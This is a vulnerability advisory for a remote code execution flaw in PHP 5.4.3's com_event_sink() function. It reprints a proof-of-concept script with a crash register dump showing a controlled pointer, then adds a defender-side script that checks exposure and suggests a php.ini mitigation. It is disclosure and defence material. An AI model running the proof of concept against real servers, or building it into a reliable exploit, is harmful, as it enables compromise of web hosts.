PHP 5.4.3 'com_event_sink()' Remote Code Execution Vulnerability
Published: 2012-05-11
Affected versions:
PHP 5.4.3
Vulnerability description:
BUGTRAQ ID: 53642. PHP is a server-side scripting language embedded in HTML documents; it resembles Microsoft's ASP in several respects, has a C-like syntax, and is widely used by web developers. The com_event_sink() function in PHP 5.4.3 contains an implementation flaw that a remote attacker can exploit to execute arbitrary code on an affected web server.
Reference: http://isc.sans.edu/diary.html?storyid=13255
Test method:
Sebug.net disclaimer: the programs (methods) provided on this site may be offensive in nature and are intended solely for security research and teaching; use at your own risk.
<?php
/*
PHP <= 5.4.3 (com_event_sink) Code Execution Proof of Concept
Found by condis
Website: http://cond.psychodela.pl

Tested on:
PHP 5.3.8 + Windows XP SP3 Professional PL
PHP 5.3.10 + Windows XP SP3 Professional PL
PHP 5.4.0 + Windows XP SP3 Professional PL
PHP 5.4.3 + Windows XP SP3 Professional PL

Description:
This is a very strange bug and I had a really hard time trying to classify
it, but let's start from the beginning.
As we can read in the PHP manual: the com_event_sink function connects events from
a COM object to a PHP object. The first argument should be a COM object. But when
I set it up to new Variant(), the PHP instance crashed.
After a few minutes of research it was clear to me that we can control the EAX
register by defining the first parameter of our Variant object.
The proof of concept code located below should produce a situation similar to
this:

eax=024e0050 ebx=010328f0 ecx=41414141 edx=00c0facc esi=0121ff68 edi=00000000
eip=100f33d5 esp=00c0faa8 ebp=00000000 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
100f33d4 50   push eax
100f33d5 8b01 mov eax,dword ptr [ecx] ds:0023:41414141=????????
100f33d7 ffd0 call eax

IMHO it is possible to write a reliable exploit using i.e.: the ROP method but due
to lack of free time and skill I leave this task to someone else. Also 0in tried
to write a stable exploit for the same bug in the com_print_typeinfo() function but as far
as I know it isn't stable enough :(

Greetz: cxib, 0in, and others ;>
*/

$EAX = 0x024E0050; // stack starts at 0x024E0050 (in my case)
$stack = str_repeat("\x41", 0x1000000); // putting some garbage on the stack so the ECX would be 41414141
class foo { }
com_event_sink(new Variant($EAX), new foo(), array());
?>
Security recommendations:
Vendor patch: PHP --- The vendor has not yet released a patch or upgrade. Users of this software should follow the vendor's homepage for the latest version: http://www.php.net
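Since the advisory offers no vendor fix, the practical defence is to confirm whether the affected COM functions are callable at all on a given PHP build and, if they are, to disable them. The script below is an added example written for this page (it is not part of the Sebug advisory or of the original proof of concept). It checks whether com_event_sink() and com_print_typeinfo() (both named on this page) are reachable, whether the com_dotnet extension is loaded, and whether the running version falls in the range the advisory describes (PHP <= 5.4.3); it then prints the php.ini change that removes the exposure. The function names com_exposure_report() and com_exposure_advice() are this example's own; the remediation relies only on the standard disable_functions directive and on not loading php_com_dotnet.dll.

```php
<?php
// Added example: defender-side exposure check for the com_event_sink() issue.
// Not part of the Sebug advisory or of condis' proof of concept.
// Written without scalar type hints so it also runs on the affected 5.3/5.4 builds.

function com_exposure_report()
{
    // Both functions are named in the advisory text; 0in's note concerns com_print_typeinfo().
    $risky = array('com_event_sink', 'com_print_typeinfo');
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));

    $report = array(
        'php_version'       => PHP_VERSION,
        // Affected range taken from the advisory heading ("PHP <= 5.4.3").
        'version_affected'  => version_compare(PHP_VERSION, '5.4.3', '<='),
        'com_dotnet_loaded' => extension_loaded('com_dotnet'),
        'reachable'         => array(),
        'disabled'          => array(),
    );

    foreach ($risky as $fn) {
        if (in_array($fn, $disabled, true)) {
            $report['disabled'][] = $fn;          // explicitly blocked in php.ini
        } elseif (function_exists($fn)) {
            $report['reachable'][] = $fn;         // extension loaded and function callable
        }
        // Otherwise the COM extension is simply absent (e.g. non-Windows build).
    }
    return $report;
}

function com_exposure_advice(array $r)
{
    if (!$r['com_dotnet_loaded'] && count($r['reachable']) === 0) {
        return 'OK: com_dotnet extension not loaded; com_event_sink() is not callable.';
    }
    if (count($r['reachable']) === 0) {
        return 'OK: risky COM functions are listed in disable_functions.';
    }

    $lines = array('WARNING: ' . implode(', ', $r['reachable'])
        . ' reachable on PHP ' . $r['php_version'] . '.');
    if ($r['version_affected']) {
        $lines[] = 'This version is within the range the advisory lists as affected.';
    }
    $lines[] = 'Mitigation (php.ini): disable_functions = ' . implode(',', $r['reachable']);
    $lines[] = 'or remove "extension=php_com_dotnet.dll" so the COM extension is not loaded.';
    return implode(PHP_EOL, $lines);
}

echo com_exposure_advice(com_exposure_report()), PHP_EOL;
```

Run it from the same php.ini the web server uses (php -c path/to/php.ini check.php, or drop it into the document root once under a name you control) so that the disable_functions and extension settings it reads are the ones actually in effect for web requests.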